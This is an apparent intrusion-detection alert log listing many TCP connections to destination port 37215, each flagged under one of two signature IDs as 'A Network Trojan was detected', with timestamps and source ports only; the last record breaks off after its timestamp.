                Timestamp:06/14/24-10:44:00.322718
                SID:2829579
                Source Port:52678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687771
                SID:2835222
                Source Port:54780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675865
                SID:2829579
                Source Port:47258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847727
                SID:2835222
                Source Port:56082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977788
                SID:2829579
                Source Port:39818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.642624
                SID:2829579
                Source Port:49346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879295
                SID:2829579
                Source Port:59546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543051
                SID:2835222
                Source Port:59660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.143380
                SID:2835222
                Source Port:55276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776806
                SID:2829579
                Source Port:60840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762573
                SID:2835222
                Source Port:49684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.846091
                SID:2829579
                Source Port:55630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289152
                SID:2835222
                Source Port:60304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916971
                SID:2835222
                Source Port:48280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202206
                SID:2829579
                Source Port:52954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.704524
                SID:2829579
                Source Port:34602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813531
                SID:2835222
                Source Port:55528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702359
                SID:2835222
                Source Port:51936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762942
                SID:2835222
                Source Port:40648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702055
                SID:2835222
                Source Port:34588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979403
                SID:2835222
                Source Port:59124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702404
                SID:2835222
                Source Port:55294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408296
                SID:2829579
                Source Port:36678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617562
                SID:2829579
                Source Port:50056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899963
                SID:2835222
                Source Port:34348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678602
                SID:2835222
                Source Port:33360
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291338
                SID:2829579
                Source Port:39354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451624
                SID:2829579
                Source Port:45518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292987
                SID:2829579
                Source Port:47548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322629
                SID:2835222
                Source Port:39750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.719099
                SID:2835222
                Source Port:42520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792192
                SID:2829579
                Source Port:42448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.689437
                SID:2829579
                Source Port:50536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716098
                SID:2835222
                Source Port:34062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184246
                SID:2829579
                Source Port:43450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501189
                SID:2835222
                Source Port:54726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001889
                SID:2829579
                Source Port:52244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073151
                SID:2829579
                Source Port:41598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916883
                SID:2835222
                Source Port:43176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717837
                SID:2835222
                Source Port:48628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.326075
                SID:2829579
                Source Port:43778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805063
                SID:2829579
                Source Port:38556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114973
                SID:2829579
                Source Port:57538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980278
                SID:2829579
                Source Port:42980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024949
                SID:2829579
                Source Port:53874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997403
                SID:2835222
                Source Port:54478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777929
                SID:2835222
                Source Port:33768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.198962
                SID:2835222
                Source Port:38878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.339195
                SID:2835222
                Source Port:41972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998700
                SID:2835222
                Source Port:49546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645056
                SID:2835222
                Source Port:40546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848725
                SID:2835222
                Source Port:56250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201610
                SID:2829579
                Source Port:53310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980041
                SID:2829579
                Source Port:54958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055746
                SID:2835222
                Source Port:57806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292351
                SID:2835222
                Source Port:41080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411640
                SID:2829579
                Source Port:53970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471881
                SID:2835222
                Source Port:55520
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662156
                SID:2835222
                Source Port:49752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504591
                SID:2835222
                Source Port:34266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701098
                SID:2829579
                Source Port:45224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383555
                SID:2829579
                Source Port:42112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546496
                SID:2829579
                Source Port:47788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.760999
                SID:2835222
                Source Port:50658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369269
                SID:2835222
                Source Port:48026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617538
                SID:2835222
                Source Port:53810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365748
                SID:2829579
                Source Port:51804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880990
                SID:2829579
                Source Port:33462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407515
                SID:2829579
                Source Port:57756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011930
                SID:2829579
                Source Port:59126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505025
                SID:2835222
                Source Port:54800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146748
                SID:2829579
                Source Port:37526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.088957
                SID:2829579
                Source Port:48800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164008
                SID:2835222
                Source Port:50066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074230
                SID:2829579
                Source Port:44508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944141
                SID:2829579
                Source Port:43832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984210
                SID:2829579
                Source Port:49188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.368414
                SID:2835222
                Source Port:47990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018479
                SID:2835222
                Source Port:43592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230315
                SID:2835222
                Source Port:39832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.505082
                SID:2829579
                Source Port:36056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180054
                SID:2829579
                Source Port:45050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761099
                SID:2829579
                Source Port:48758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275303
                SID:2829579
                Source Port:47242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804177
                SID:2829579
                Source Port:53080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011582
                SID:2829579
                Source Port:56256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999845
                SID:2835222
                Source Port:42846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615854
                SID:2829579
                Source Port:52112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183164
                SID:2835222
                Source Port:42136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027420
                SID:2835222
                Source Port:55168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200852
                SID:2829579
                Source Port:33582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453508
                SID:2835222
                Source Port:43910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028098
                SID:2835222
                Source Port:43492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766858
                SID:2835222
                Source Port:41220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.618427
                SID:2829579
                Source Port:37756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671062
                SID:2835222
                Source Port:34812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001582
                SID:2835222
                Source Port:40352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764102
                SID:2829579
                Source Port:36964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365813
                SID:2829579
                Source Port:44150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423545
                SID:2829579
                Source Port:40896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.032487
                SID:2835222
                Source Port:55486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149114
                SID:2835222
                Source Port:43262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914626
                SID:2829579
                Source Port:42880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501917
                SID:2835222
                Source Port:34734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.688207
                SID:2829579
                Source Port:32900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913993
                SID:2835222
                Source Port:49680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025107
                SID:2829579
                Source Port:54680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411137
                SID:2835222
                Source Port:44596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184984
                SID:2835222
                Source Port:36366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.772496
                SID:2835222
                Source Port:46900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879695
                SID:2835222
                Source Port:48638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019425
                SID:2829579
                Source Port:58352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878423
                SID:2829579
                Source Port:43398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276029
                SID:2829579
                Source Port:45822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165201
                SID:2835222
                Source Port:42960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914318
                SID:2835222
                Source Port:39600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470804
                SID:2835222
                Source Port:36384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.613897
                SID:2835222
                Source Port:45596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777845
                SID:2835222
                Source Port:46580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420809
                SID:2835222
                Source Port:55618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184440
                SID:2835222
                Source Port:46788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.319833
                SID:2829579
                Source Port:51602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293373
                SID:2835222
                Source Port:53872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.409368
                SID:2835222
                Source Port:55754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667165
                SID:2835222
                Source Port:53430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111755
                SID:2835222
                Source Port:34244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344357
                SID:2835222
                Source Port:42014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180621
                SID:2835222
                Source Port:48274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660644
                SID:2829579
                Source Port:44950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563718
                SID:2835222
                Source Port:52372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381198
                SID:2829579
                Source Port:55136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110612
                SID:2835222
                Source Port:57634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726702
                SID:2829579
                Source Port:32926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.845959
                SID:2835222
                Source Port:35024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.229019
                SID:2829579
                Source Port:53172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.405640
                SID:2829579
                Source Port:57856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849511
                SID:2829579
                Source Port:53542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.148997
                SID:2829579
                Source Port:42756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640861
                SID:2835222
                Source Port:35752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563492
                SID:2835222
                Source Port:49164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.765649
                SID:2829579
                Source Port:45456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228032
                SID:2835222
                Source Port:46264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366806
                SID:2829579
                Source Port:57448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666442
                SID:2829579
                Source Port:51872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759163
                SID:2829579
                Source Port:50388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020687
                SID:2829579
                Source Port:39890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829276
                SID:2835222
                Source Port:34352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200351
                SID:2835222
                Source Port:53954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789027
                SID:2829579
                Source Port:59748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011291
                SID:2835222
                Source Port:40166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809442
                SID:2829579
                Source Port:42912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228162
                SID:2829579
                Source Port:41606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677827
                SID:2829579
                Source Port:52318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.164073
                SID:2829579
                Source Port:35486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914437
                SID:2829579
                Source Port:35022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.078411
                SID:2835222
                Source Port:42966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152277
                SID:2835222
                Source Port:53166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149565
                SID:2835222
                Source Port:48466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.882102
                SID:2829579
                Source Port:34734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185586
                SID:2835222
                Source Port:37726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543446
                SID:2829579
                Source Port:50094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149797
                SID:2835222
                Source Port:51116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.179376
                SID:2829579
                Source Port:56530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.967363
                SID:2835222
                Source Port:49430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761174
                SID:2829579
                Source Port:58450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.288692
                SID:2835222
                Source Port:46378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861437
                SID:2829579
                Source Port:48108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275159
                SID:2829579
                Source Port:45028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761323
                SID:2835222
                Source Port:40414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790238
                SID:2829579
                Source Port:45178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.520707
                SID:2829579
                Source Port:48030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200747
                SID:2829579
                Source Port:53374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702888
                SID:2829579
                Source Port:34554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.699588
                SID:2835222
                Source Port:33858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646383
                SID:2829579
                Source Port:49376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111055
                SID:2835222
                Source Port:34872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275904
                SID:2829579
                Source Port:35960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734384
                SID:2829579
                Source Port:36948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991510
                SID:2835222
                Source Port:37290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779301
                SID:2835222
                Source Port:35906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132164
                SID:2835222
                Source Port:41748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.160491
                SID:2829579
                Source Port:52522
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471970
                SID:2829579
                Source Port:48778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.644829
                SID:2835222
                Source Port:34002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702948
                SID:2829579
                Source Port:33044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057425
                SID:2835222
                Source Port:52944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073458
                SID:2835222
                Source Port:60662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807275
                SID:2835222
                Source Port:43556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546227
                SID:2835222
                Source Port:58262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.002291
                SID:2835222
                Source Port:50856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.567618
                SID:2829579
                Source Port:45576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669882
                SID:2829579
                Source Port:47134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806920
                SID:2835222
                Source Port:48110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202973
                SID:2835222
                Source Port:53236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568347
                SID:2835222
                Source Port:40004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073491
                SID:2835222
                Source Port:54164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678980
                SID:2835222
                Source Port:36912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.646687
